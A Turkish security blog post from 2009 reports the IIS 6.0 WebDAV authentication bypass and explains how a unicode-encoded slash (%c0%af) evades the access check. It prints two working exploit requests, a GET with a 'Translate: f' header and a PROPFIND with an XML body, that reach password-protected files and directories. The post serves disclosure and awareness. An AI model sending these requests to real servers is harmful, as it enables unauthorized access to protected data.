Şifre Kırıcılar ve Güvenli Bir Şifre (13239)
Kaspersky ve AntiVir'den 6 Aylık Ücretsiz Lisans (9742)
ActiveX Nedir? ActiveX ile Neler Yapılabilir? (9215)
XP SP3 Hakkında Bilmeniz Gerekenler (7617)
Microsoft Office Programları ve Güvenlik (6688)

Son Videolar

Kullanıcı girişi

Gezinti

Ağ günlüğü

daha fazla

Anket

Son yorumlar

guzel
9 hafta 4 gün önce
Güzel yazı
18 hafta 6 gün önce
Pek iyi bir şey olduğunu
19 hafta 1 gün önce
haftada 30 saatmi :) Ben
19 hafta 2 gün önce
sertifika güvenliği derken
19 hafta 2 gün önce
George Hotz
21 hafta 3 saat önce
Bazen 2 günde 30 saatten
21 hafta 2 gün önce
Radikal Karar
21 hafta 2 gün önce
Okurken Krizlere Girdim,
25 hafta 3 gün önce
Videoları .avi
25 hafta 3 gün önce

Kimler çevrimiçi

Şu an 0 kullanıcı ve 7 ziyaretçi çevrimiçi.

IIS 6.0 Güvenlik Açığı

Tarih: 16 Mayıs 2009, Cts - Yazar: fuzbing - Etiketler:

Microsoft'un Internet Information Server (IIS) 6.0 versiyonunda WebDav'dan kaynaklanan bir güvenlik açığı tespit edildi. Bu açıkla birlikte şifre korumalı dizinlere ulaşım sağlanabiliyor ve dosya yükleme işlemleri gerçekleştirilebiliyor. Ayrıca açık sadece WebDav klasörlerinde de geçerli değil, sunucunun barındırdığı tüm dizinleri kapsıyor.

Güvenlik uzmanı Nicolaos Rangos'un bildirdiğine göre aşağıdaki örnekteki gibi bir header gönderildiğinde korumalı bir dosya sıradan bir dosyaya dönüşebiliyor.

GET /..%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername

Bu örnekte slash (/) karakteri %c0%af unikodu ile gizlenmiş durumda ve güvenlik fonksiyonu bunu atlamakta bu nedenle /protected/protected.zip dosyasına ulaşım sağlanabiliyor. Translate: f seçeneği ise sıradan dosyalar için WebDav fonksiyonunu devreye sokuyor.

Doğrudan WebDav klasörlerine erişmek ise daha karmaşık olsada imkansız değil.

PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>

Fakat bu yöntemlerle asp betiklerini çekebilmek mümkün değil. Benzer bir güvenlik açığı 2000 yılında IIS 4 üzerinde de tespit edilmişti. Güvenlik uzmanı Thierry Zoller bu iki güvenlik açığını kendi blogunda karşılaştırmış.

Kaynak: http://seclists.org/fulldisclosure/2009/May/0134.html

Yorum göndermek için giriş yapın veya kayıt olun

İlgili Yazılar

Telif Hakkı

Bu yazının telif hakkı, içeriğinde aksi belirtilmemişse yazarına aittir ©. Yazının izin alınmadan ya da kaynak gösterilmeden kopyalanması ve kullanılması 5846 sayılı Fikir ve Sanat Eserleri Yasasına göre suçtur (forum ve bloglar dahil olmak üzere). Telif haklarına aykırı bir durumla karşılaşırsanız lütfen site yetkililerine bildiriniz.

Etiketler

Ağ Güvenliği Güvenlik Güvenlik Açıkları Haberler Hack Hacking Kriptografi Linux Makaleler Microsoft

daha fazla

Siteden

Güvenli.org: Hakkında | Gizlilik | İletişim

Kategoriler: Haberler | Makaleler | Güvenlik Açıkları

Rss Besleme: Ana Sayfa | Günlükler

Destekliyoruz

HackInTheBox
Belgeler.org

Üst Menü